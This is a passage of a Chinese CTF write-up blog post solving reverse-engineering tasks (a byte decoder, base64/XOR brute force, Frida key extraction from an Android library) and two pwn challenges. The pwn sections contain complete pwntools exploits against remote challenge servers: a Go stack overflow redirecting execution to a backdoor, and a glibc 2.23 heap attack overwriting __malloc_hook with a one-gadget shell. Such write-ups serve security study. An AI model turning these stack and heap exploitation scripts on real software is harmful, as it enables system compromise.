#include <bits\/stdc++.h>\nusing namespace std;\n\nunsigned char data[] = {0xD7, 0x1F, 0x00, 0x00, 0xB7, 0x21, 0x00, 0x00, 0x47, 0x1E, 0x00, 0x00, 0x27, 0x20, 0x00, 0x00, 0xE7, 0x26, 0x00, 0x00, 0xD7, 0x10, 0x00, 0x00, 0x27, 0x11, 0x00, 0x00, 0x07, 0x20, 0x00, 0x00, 0xC7, 0x11, 0x00, 0x00, 0x47, 0x1E, 0x00, 0x00, 0x17, 0x10, 0x00, 0x00, 0x17, 0x10, 0x00, 0x00, 0xF7, 0x11, 0x00, 0x00, 0x07, 0x20, 0x00, 0x00, 0x37, 0x10, 0x00, 0x00, 0x07, 0x11, 0x00, 0x00, 0x17, 0x1F, 0x00, 0x00, 0xD7, 0x10, 0x00, 0x00, 0x17, 0x10, 0x00, 0x00, 0x17, 0x10, 0x00, 0x00, 0x67, 0x1F, 0x00, 0x00, 0x17, 0x10, 0x00, 0x00, 0xC7, 0x11, 0x00, 0x00, 0xC7, 0x11, 0x00, 0x00, 0x17, 0x10, 0x00, 0x00, 0xD7, 0x1F, 0x00, 0x00, 0x17, 0x1F, 0x00, 0x00, 0x07, 0x11, 0x00, 0x00, 0x47, 0x0F, 0x00, 0x00, 0x27, 0x11, 0x00, 0x00, 0x37, 0x10, 0x00, 0x00, 0x47, 0x1E, 0x00, 0x00, 0x37, 0x10, 0x00, 0x00, 0xD7, 0x1F, 0x00, 0x00, 0x07, 0x11, 0x00, 0x00, 0xD7, 0x1F, 0x00, 0x00, 0x07, 0x11, 0x00, 0x00, 0x87, 0x27, 0x00, 0x00};\n\nint main(void)\n{\n    for(int i = 0; i < sizeof(data)\/4; i++)\n    {\n        ((unsigned int *)data)[i] = (((((unsigned int *)data)[i]-0x1e)^0x4d)-0x14)\/0x50;\n        printf("%c", ((unsigned int *)data)[i]);\n    }\n\n    return 0;\n}\n\/\/ flag{67e9a228e45b622c2992fb5174a4f5f5}<\/code><\/pre>\n
whereThel1b<\/h2>\n
base64\u540e\u5355\u5b57\u8282\u52a0\u5bc6\uff0c\u52a0\u5bc6\u51fd\u6570\u4f7f\u7528random.seed()\u6dfb\u52a0\u79cd\u5b50\uff0c\u7136\u540e\u8c03\u7528whereistheflag1\uff0c\u8be5\u51fd\u6570\u4e2d\u5148 \u5bf9\u8f93\u5165\u5b57\u7b26\u8fdb\u884cbase64\u52a0\u5bc6\uff0c\u7136\u540e\u53bbrandint\u83b7\u5f97\u968f\u673a\u6570\uff0c\u8fdb\u884cxor\u52a0\u5bc6<\/p>\n
choose_data = list(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_+\/=")\nencry = [108, 117, 72, 80, 64, 49, 99, 19, 69, 115, 94, 93, 94, 115, 71, 95, 84, 89, 56, 101, 70, 2, 84, 75, 127, 68, 103, 85, 105, 113, 80, 103, 95, 67, 81, 7, 113, 70, 47, 73, 92, 124, 93, 120, 104, 108, 106, 17, 80, 102, 101, 75, 93, 68, 121, 26]\nflag = b"flag{412edff5-0914-450a-9f5d-e0165ebb5cf6}"\nflag_base = list(b"flag{") + list(b'0')*37\n\nfor i in range(36):\n\n    for j in choose_data:\n        flag_base[i+5] = j\n        import whereThel1b\n        # a = whereThel1b.whereistheflag(bytes(flag_base))\n        ret = whereThel1b.trytry(bytes(flag_base))\n    print("".join([chr(i) for i in flag_base]), ret)\n\n# flag{=000000000000000000000000000000000000 [108, 117, 72, 80, 64, 49, 99, 25, 82, 93, 115, 66, 94, 90, 87, 82, 64, 100, 73, 101, 69, 116, 71, 80, 126, 84, 99, 90, 126, 98, 72, 100, 75, 106, 69, 65, 102, 81, 95, 84, 75, 82, 90, 99, 106, 108, 76, 84, 83, 88, 118, 86, 93, 71, 114, 84]<\/code><\/pre>\n
from base64 import b64encode\na = b"flag{=000000000000000000000000000000000000"\nencry = [108, 117, 72, 80, 64, 49, 99, 19, 69, 115, 94, 93, 94, 115, 71, 95, 84, 89, 56, 101, 70, 2, 84, 75, 127, 68, 103, 85, 105, 113, 80, 103, 95, 67, 81, 7, 113, 70, 47, 73, 92, 124, 93, 120, 104, 108, 106, 17, 80, 102, 101, 75, 93, 68, 121, 26]\n\na1 = list(b64encode(a))\na2 = [108, 117, 72, 80, 64, 49, 99, 25, 82, 93, 115, 66, 94, 90, 87, 82, 64, 100, 73, 101, 69, 116, 71, 80, 126, 84, 99, 90, 126, 98, 72, 100, 75, 106, 69, 65, 102, 81, 95, 84, 75, 82, 90, 99, 106, 108, 76, 84, 83, 88, 118, 86, 93, 71, 114, 84]\nfor i in range(len(a1)):\n    print(chr(encry[i]^a2[i]^a1[i]),end="")\n\n# ZmxhZ3s3ZjlhMmQzYy0wN2RlLTExZWYtYmU1ZS1jZjFlODg2NzRjMGJ9\n\n# echo ZmxhZ3s3ZjlhMmQzYy0wN2RlLTExZWYtYmU1ZS1jZjFlODg2NzRjMGJ9 | base64 -d\n# flag{7f9a2d3c-07de-11ef-be5e-cf1e88674c0b}<\/code><\/pre>\n
androidso_re<\/h2>\n
1.\u7b2c\u4e00\u6b65\u4f7f\u7528jadx\u8fdb\u884c\u63a8\u6d4b\uff1a<\/strong><\/p>\n
\"\"<\/p>\n
\u5b9a\u4f4d\u5173\u952e\u903b\u8f91<\/p>\n
\"\"<\/p>\n
\u53bb\u627e\u94a5\u5319\u548civ\uff0c\u53d1\u73b0\u5728\u9759\u6001so\u6587\u4ef6\u91cc\u9762<\/p>\n
\"image\"<\/p>\n
2.\u4f7f\u7528frida\u8fdb\u884c\u6c42\u89e3<\/strong><\/p>\n
function frida() {\n    Java.perform(function () {\n        var iv = Java.use("com.example.re11113.jni");\n        var res = iv.getiv();\n        console.log(res);\n        var key = Module.findExportByName("libSecret_entrance.so","Java_com_example_re11113_jni_getkey");\n        Interceptor.attach(key,{\n            onEnter:function (args){\n            },onLeave:function (retval){\n        }});\n        var key1 = jni.getkey();\n        console.log(key1);\n    });\n}<\/code><\/pre>\n
\u76f4\u63a5\u62ff\u5230iv\u548ckey\u2014\u2014Wf3DLups<\/code>\u3001A8UdWaeq<\/code><\/p>\n
\u4f7f\u7528\u53a8\u5b50\u8fdb\u884c\u89e3\u5bc6\u62ff\u5230flag<\/p>\n
\"image\"<\/p>\n
pwn<\/h1>\n
gostack<\/h2>\n
\u6839\u636e\u9898\u76ee\u63d0\u793a\u53ef\u77e5\u4e3a\u6808\u6ea2\u51fa\uff0c \u901a\u8fc7 cyclic 500<\/code>\u200b \u6d4b\u8bd5\u76f4\u63a5\u5373\u53ef\u89e6\u53d1\u7a0b\u5e8f\u5d29\u6e83\uff1b<\/p>\n
\u5206\u6790<\/p>\n
\/\/ main.main.func3\n...\nchar v31[72]; \/\/ [rsp+48h] [rbp-1D0h] BYREF\n...\nv36 = v31;\n...\nbufio__ptr_Scanner_Scan(v39, v7, v9, (_QWORD *)2, (unsigned int)v35, v10, v11, v12, v13);\nv32 = (unsigned __int8 *)runtime_slicebytetostring(0LL, v40, v41, 2, (int)v35, v15, v16, v17, v18);\n...\nv23 = v36;\nv24 = v32;\nfor ( i = 0LL; (__int64)v14 > i; ++i )\n  {\n \u00a0 \u00a0v19 = *v24;\n \u00a0 \u00a0*v23++ = v19;\n \u00a0 \u00a0++v24;\n  }\n...<\/code><\/pre>\n
\u5206\u6790\u5982\u4e0a\u4ee3\u7801\u53ef\u77e5\uff0c\u7a0b\u5e8f\u5c06scanner\u83b7\u53d6\u7684\u8f93\u5165\u901a\u8fc7slicebytetostring\u51fd\u6570\u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32\uff0c\u5e76\u901a\u8fc7\u4e00\u6bb5\u5faa\u73af\u5199\u5165\u5b57\u7b26\u6570\u7ec4v31\uff0c\u8be5\u5904\u4f4d\u4e8e rbp-1D0h<\/code>\u200b \uff0c\u5b58\u5728\u6808\u6ea2\u51fa\u4e14\u7a0b\u5e8f\u672a\u5f00\u542fcanary\u4fdd\u62a4\uff0c\u5b58\u5728\u5229\u7528\u53ef\u80fd\u3002<\/p>\n
\u7531\u4e8e\u5728\u5faa\u73af\u62f7\u8d1d\u7ed3\u675f\u540e\uff0c\u7a0b\u5e8f\u7ee7\u7eed\u8c03\u7528\u4e86convTstring\u51fd\u6570\u548cfmt_Fprintf\u51fd\u6570\u8fdb\u884c\u8f93\u51fa\uff0c\u4ecd\u4f1a\u5f15\u7528\u6808\u4e0a\u53d8\u91cf\uff0c\u76f4\u63a5\u4f7f\u7528 aa...aa<\/code>\u200b \u8fdb\u884c\u6ea2\u51fa\u4f1a\u5bfc\u81f4\u5728fmt_Fprintf\u5185\u90e8\u8c03\u7528\u7684fmt__ptr_pp_doPrintf\u51fd\u6570\u5d29\u6e83\uff0c\u4e0b\u56fe\u4e3a\u6267\u884c\u5230fmt_Fprintf\u524d\u6bd4\u8f83\u6b63\u5e38\u8f93\u5165\u548c\u6ea2\u51fa\u65f6\u7684\u5bc4\u5b58\u5668\u5bf9\u6bd4\uff1a\u731c\u6d4br11\u5bfc\u81f4\u5d29\u6e83\u3002<\/p>\n
\"\"<\/p>\n
\u901a\u8fc7\u8c03\u8bd5\u53ef\u77e5\uff0cr11\u7684\u8d4b\u503c\u5b58\u5728\u4e8econvTstring\u51fd\u6570\u5185\u90e8\uff0c\u8be5\u51fd\u6570\u6c47\u7f16\u5982\u4e0b\uff1a<\/p>\n
.text:00000000004A0A31 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 mov \u00a0 \u00a0 rax, [rsp+208h+var_D0]\n.text:00000000004A0A39 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 mov \u00a0 \u00a0 rbx, [rsp+208h+var_C8]\n.text:00000000004A0A41 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 call \u00a0  runtime_convTstring<\/code><\/pre>\n
\u53ea\u9700\u63a7\u5236rax\u548crbx\u5bf9\u5e94\u53d6\u503c\u7684\u6808\u5e27\u4e3a\u6b63\u5e38\u503c\u5373\u53ef\uff0c\u5206\u522b\u4e3a\u5b57\u7b26\u4e32\u6307\u9488\u548c\u957f\u5ea6\u3002<\/p>\n
\u901a\u8fc7\u8c03\u8bd5\u8ba1\u7b97\u51fa\u504f\u79fb\u4e3a0x100\uff1a<\/p>\n
main_func1 = 0x00000000004A05A0\npayload = 'a'*0x100 + p64(0xc000118000) + p64(0x200)\npayload = payload.ljust(0x1d0, 'a') + p64(main_func2)<\/code><\/pre>\n
\u901a\u8fc7\u5982\u4e0apayload\u5373\u6ea2\u51fa\u52ab\u6301\u7a0b\u5e8f\u6267\u884c\u6d41\u8df3\u8f6c\u6267\u884c\u9884\u7559\u540e\u95e8main_func2\u3002<\/p>\n
exp\uff1a<\/p>\n
from pwn import *\n#context.terminal = ['tmux', 'splitw', '-h']\ncontext(arch = 'amd64', os = 'linux', log_level = 'debug')\nbinary = 'gostack'\n\ndebug = 0\n\nif debug == 1:\n \u00a0 \u00a0sh = process('.\/' + binary)\n \u00a0 \u00a0libc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\nelse:\n \u00a0 \u00a0sh = remote('8.147.132.163', 20263)\n \u00a0 \u00a0# libc = ELF('.\/' + 'libc-2.23.so')\nelf = ELF('.\/' + binary)\n\ndef d():\n \u00a0 \u00a0gdb.attach(sh, 'b *0x4A09EA')\n \u00a0 \u00a0pause()\n\n# d()\nbss = 0x00000000005641B0\npop_rax_ret = 0x000000000040f984\npop_rdi_3_rbp_rbx_ret = 0x00000000004a18a5\npop_rsi_ret = 0x000000000042138a\npop_rdx_ret = 0x00000000004944ec\nsyscall = 0x0000000000404043\nbackdoor = 0x00000000004A0120\ncheck = 0x4A0520\n_syscall_Syscall = 0x404020\nmain2 = 0x4A05A0\n\nsh.recvuntil('Input your magic message :\\n')\n\npayload = '\/bin\/sh\\x00'*0x20 + p64(0xc000118000) + p64(0x200)\npayload = payload.ljust(0x1d0, 'a')\npayload += p64(main2)\n# payload += p64(_syscall_Syscall) + p64(0) + p64(59) + p64(binsh) + p64(0) + p64(0)\n\nsh.sendline(payload)\n\nsh.interactive()<\/code><\/pre>\n
\"\"<\/p>\n
orange cat diary<\/h2>\n
\n
glibc 2.23<\/strong><\/p>\n<\/blockquote>\n
\u5206\u6790<\/p>\n
\u7a0b\u5e8f\u529f\u80fd\u5982\u4e0b\uff1a<\/strong><\/p>\n
    \n
  • add\uff1a0~0x1000<\/strong><\/li>\n
  • edit\uff1a\u53ef\u6ea2\u51fa0x8\u5b57\u8282<\/strong><\/li>\n
  • free & show\uff1a\u4ec5\u5404\u4e00\u6b21\u673a\u4f1a\uff08\u5b58\u5728UAF\uff09<\/strong><\/li>\n<\/ul>\n
    \u5229\u7528<\/p>\n
    ****\u901a\u8fc7\u6ea2\u51fa8\u5b57\u8282\u4fee\u6539top chunk\u7684size\u5c0f\u4e8e0x1000\uff0c\u518d\u6b21malloc\u540e\u5373\u53ef\u5206\u914d\u65b0\u7684top chunk\uff0c\u65e7\u7684\u8fdb\u5165unsorted bin\uff0c\u6b64\u65f6\u5206\u914dchunk\u5e76show\u5373\u53ef\u6cc4\u9732\u51falibc\u5730\u5740\uff1b\u7136\u540e\u901a\u8fc7edit\u4fee\u6539free\u540e\u76840x70\u5927\u5c0f\u7684chunk\u7684fd\u6307\u9488\uff0c\u52ab\u6301__malloc_hook\u4e3aone gadget\uff0c\u5b8c\u6210\u5229\u7528\u3002<\/p>\n
    exp\uff1a<\/p>\n
    from pwn import *\n#context.terminal = ['tmux', 'splitw', '-h']\ncontext(arch = 'amd64', os = 'linux', log_level = 'debug')\nbinary = 'orange_cat_diary'\n\ndebug = 0\n\nif debug == 1:\n \u00a0 \u00a0sh = process('.\/' + binary)\n \u00a0 \u00a0libc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\nelse:\n \u00a0 \u00a0sh = remote('8.147.133.63', 22694)\n \u00a0 \u00a0libc = ELF('.\/' + 'libc-2.23.so')\nelf = ELF('.\/' + binary)\n\ndef d():\n \u00a0 \u00a0gdb.attach(sh)\n \u00a0 \u00a0pause()\n\ndef menu(choice):\n \u00a0 \u00a0sh.sendlineafter("Please input your choice:", str(choice))\n\ndef add(size, content):\n \u00a0 \u00a0menu(1)\n \u00a0 \u00a0sh.sendlineafter("Please input the length of the diary content:", str(size))\n \u00a0 \u00a0sh.sendafter("Please enter the diary content:\\n", content)\n\ndef show():\n \u00a0 \u00a0menu(2)\n\ndef delete():\n \u00a0 \u00a0menu(3)\n\ndef edit(size, content):\n \u00a0 \u00a0menu(4)\n \u00a0 \u00a0sh.sendlineafter("Please input the length of the diary content:", str(size))\n \u00a0 \u00a0sh.sendafter("Please enter the diary content:\\n", content)\n\nsh.recvuntil("Hello, I'm delighted to meet you. Please tell me your name.\\n")\n\npayload = 'a'*0x4\nsh.sendline(payload)\n\nadd(0x28, 'a')\n\npayload = 'a'*0x28 + p64(0xfd1)\nedit(0x30, payload)\n\nadd(0x1000, 'a')\n\nadd(0x20, 'b'*8)\n\nshow()\nlibc.address = u64(sh.recvuntil('\\x7f')[-6:].ljust(8, '\\x00')) - 0x3c5188\nprint('libc.address: ' + hex(libc.address))\n\n'''\n0x45226 execve("\/bin\/sh", rsp+0x30, environ)\nconstraints:\n  rax == NULL\n\n0x4527a execve("\/bin\/sh", rsp+0x30, environ)\nconstraints:\n  [rsp+0x30] == NULL\n\n0xf03a4 execve("\/bin\/sh", rsp+0x50, environ)\nconstraints:\n  [rsp+0x50] == NULL\n\n0xf1247 execve("\/bin\/sh", rsp+0x70, environ)\nconstraints:\n  [rsp+0x70] == NULL\n'''\none = [0x45226, 0x4527a, 0xf03a4, 0xf1247]\n\nonegadget = libc.address + one[2]\n__malloc_hook = libc.sym['__malloc_hook']\n\nadd(0x68, 'a')\n\ndelete()\n\nedit(0x8, p64(__malloc_hook-0x23))\n\nadd(0x68, 'a')\n\npayload = 'a'*0x13 + p64(onegadget)\nadd(0x68, payload)\n\nmenu(1)\nsh.sendlineafter('the length of the diary content:', '1')\n\nsh.interactive()<\/code><\/pre>\n
    \"\"<\/p>\n
    <\/div>","protected":false},"excerpt":{"rendered":"
    WEB Simple_php <?php ini_set('open_basedir&#039 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-326","post","type-post","status-publish","format-standard","hentry","category-wp"],"views":962,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/326","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=326"}],"version-history":[{"count":2,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/326\/revisions"}],"predecessor-version":[{"id":368,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/326\/revisions\/368"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=326"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=326"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=326"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}